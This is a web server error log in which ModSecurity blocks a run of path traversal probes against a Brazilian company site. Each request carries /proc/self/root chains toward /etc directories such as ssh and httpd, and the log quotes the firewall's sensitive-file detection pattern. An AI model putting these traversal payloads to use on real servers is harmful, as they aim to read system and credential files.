[Mon Mar 16 17:58:09.559800 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.241.46:47918] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu4aTCbgAP5jq5TehGggAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:10.765800 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.241.46:47934] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu4o6lpbStxTqkSkuEiwAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:12.041219 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:47940] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu5P9ocpUE4ed4uDwOuQAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:13.258014 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:47952] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu5f9ocpUE4ed4uDwOugAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:14.595461 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.241.46:47958] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu5qQpVkWug9HeOt9O9wAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:15.779459 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.241.46:47966] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu5_9ocpUE4ed4uDwOvAAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:15.816611 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.243.203:46950] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu57ysWC90G-1nBrBf4wAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:17.100956 2026] [:error] [pid 14895:tid 140411658000128] [client 74.7.241.46:47976] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu6VajLEzk2WiQ-10t2AAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:18.319205 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.241.46:43896] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu6qTCbgAP5jq5TehGjwAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:20.034939 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.241.46:43912] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu646lpbStxTqkSkuEjgAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:21.255145 2026] [:error] [pid 29507:tid 140411607643904] [client 74.7.241.46:43918] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu7Ur9dMAiw-8KANNj8AAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:22.564662 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:43920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu7tSswJuvopo3lOh7JgAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:23.773953 2026] [:error] [pid 15568:tid 140411548894976] [client 74.7.241.46:43928] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu76QpVkWug9HeOt9O-AAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:27.490738 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.241.46:43930] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu8bysWC90G-1nBrBf5wAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:28.763520 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:39590] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu9I6lpbStxTqkSkuEjwAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:29.869683 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.241.46:39592] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu9c_BxrYCr4hPDw8F1gAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:58:37.633989 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.241.46:39594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhu_aQpVkWug9HeOt9PAwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:58:45.487359 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:53508] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvBbABkC4fWIHEf8ER2gAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:58:50.331106 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.241.46:53516] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvCrABkC4fWIHEf8ER4AAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:59:05.407574 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.243.203:35100] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvGaTCbgAP5jq5TehG3AAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:59:05.751236 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:43958] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvGf9ocpUE4ed4uDwO1AAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:59:08.218506 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:32922] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvHLysWC90G-1nBrBf-wAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
